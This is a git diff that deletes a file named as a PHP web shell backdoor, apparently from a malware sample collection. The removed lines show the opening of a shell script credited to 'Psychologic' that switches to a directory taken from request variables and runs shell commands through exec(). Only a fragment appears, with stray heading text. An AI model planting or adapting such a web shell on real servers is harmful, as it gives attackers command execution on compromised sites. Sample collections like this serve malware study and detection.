diff --git a/PHP/Backdoor.PHP.WebShell.b b/PHP/Backdoor.PHP.WebShell.b
deleted file mode 100644
index 6284c1c3..00000000
--- a/PHP/Backdoor.PHP.WebShell.b
+++ /dev/null
@@ -1,84 +0,0 @@
-
-
EXPLOIT.PHP.BROWSER
-EXPLOIT.PHP.BROWSER
-
-// Exploit.PHP.Browser By Psychologic
-// Take ur own risk if you do stupid things
-// with this.
-
-if (isset($dir_kerja)) {
-chdir($dir_kerja); //change to working directory
-$dir_kerja = exec("pwd"); //execute the pwd(daemon)
-} else {
-chdir($DOCUMENT_ROOT); //Get the root directory
-$dir_kerja = $DOCUMENT_ROOT;
-}
-if (trim($dir_baru) <> "") {
-chdir($dir_baru);
-$dir_kerja = exec("pwd");
-}
-?>
-
-
-
\ No newline at end of file